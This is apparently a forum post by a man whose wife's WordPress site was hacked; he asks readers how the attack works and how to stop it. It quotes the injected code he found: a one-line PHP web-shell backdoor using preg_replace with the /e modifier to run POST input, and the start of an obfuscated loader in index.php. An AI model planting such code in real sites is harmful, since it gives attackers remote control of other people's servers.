When I woke up this morning I walked into the kitchen to see my wife sitting on the floor with her laptop, banging away on her keyboard, muttering something about her website being hacked. Uh Oh, and I have not even had my morning coffee yet.
It looks like someone did something to do with google site verification, perhaps to take ownership of the site.
Anyways, this file was placed in the web root last night:
googleXXXXXXXXXXXX.html and it contents were simply:
google-site-verification:
googleXXXXXXXXXXXX.html
Since it just happened, I ssh'ed to a command line, grep'ed for all files with a modification date of Sep 8, then proceeded to compare suspicious lines of code to the source files found on github.
Further investigation revealed this was inserted into the wordpress responsive theme page.php file:
<?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>
This was inserted into the default wordpress index.php file:
//header('Content-Type:text/html; charset=utf-8');
$O_0O__O0O0='242';
$OO___0OO00='1';
$O_0O_00OO_='1';
$O0_O_O_O00=urldecode("a very very long string of cryptic text"]();?><?php
Seems this has got to do with a known wordpress hack:
The sitemap was modified, but the file is so large I gave up trying to find that needle in a haystack.
My best guess is somehow someone was able to take ownership of the site through that Google verification thing then modify the content of her website. I still
don't know how that can be possible through Google, since her site is hosted by goDaddy, but I am far from an expert on hosted sites.
In any case, I told my wife to do the usual... verify she is running the latest wordpress, including any plugins. I'm not sure what else to tell her.
I'd be interested to know if anyone has heard of this kind of attack, what it does, and the best way to prevent it from happening again.
Thanks,
Andy
No Trees were killed in the sending of this message.
However, a large number of electrons were terribly inconvenienced.